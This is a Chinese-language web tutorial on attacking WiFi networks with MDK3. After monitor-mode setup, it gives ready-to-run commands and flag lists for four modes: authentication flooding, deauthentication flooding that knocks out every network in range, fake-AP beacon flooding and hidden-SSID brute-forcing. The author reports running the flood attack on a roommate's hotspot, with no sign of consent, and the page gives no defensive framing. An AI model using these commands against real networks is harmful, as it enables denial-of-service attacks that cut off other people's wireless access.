您当前的位置:首页 > 计算机 > 安全防护

损人不利己 — MDK3 WiFi攻击

时间:06-20来源:作者:点击数:
  • 激活网卡为监听模式
    airmon-ng start wlan0
  • 扫描附近的无线信号
    airodump-ng mon0

方法一:身份验证攻击

这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应

  • mdk3 mon0 a
    -a<ap_mac>#测试指定BSSID
    -m#使用有效数据库中的客户端mac地址
    -c#对应 -a ,不检查是否测试成功
    -i<ap_mac>#对指定BSSID进行智能攻击
    -s<pps>#速率,默认50
  • mdk3 网卡 攻击模式 目标
    mdk3 mon0 a -aMAC
2

以下是攻击宿友电脑创建的无线,效果如下。

22
222

方法二:伪造断开连接

在这个模式下,软件会向周围所有可见AP不断发出“断开连接”的包......可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!

  • mdk3 mon0 d
    -w<filename>#白名单mac地址列表文件
    -b<filename>#黑名单mac地址列表文件
    -s<pps>#速率,这个模式下默认无限制
    -c[chan,chan,chan,...]#信道,可以多填,如 2,4,5,1
  • mdk3 mon0 d -c 11
4

以下是方法二测试视频:

方法三:伪造AP

产生大量死亡SSID来充斥无线客户端的无线列表,扰乱用户;还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。感觉鸡肋

  • mdk3 mon0 b
  • -n<ssid>#自定义ESSID
    -f<filename>#读取ESSID列表文件
    -v<filename>#自定义ESSID和BSSID对应列表文件
    -d #自定义为Ad-Hoc模式
    -w #自定义为wep模式
    -g #54Mbit模式
    -t # WPA TKIP encryption
    -a#WPA AES encryption
    -m#读取数据库的mac地址
    -c<chan>#自定义信道
    -s<pps>#发包速率
  • mdk3 --help b #查看详细内容
1
w1
w2
w3

方法四:探测AP信息和ESSID猜解模式

  • mdk3 mon0 p
    -e<ssid>#待检测的ssid
    -f<filename>#检测AP设置为隐藏的ssid列表文件
    -t<bssid>#用bssid检测AP的信息
    -s<pps>#速率,默认300
    -b<characterset>#设置字符集
方便获取更多学习、工作、生活信息请关注本站微信公众号城东书院 微信服务号城东书院 微信订阅号
推荐内容
相关内容
栏目更新
栏目热门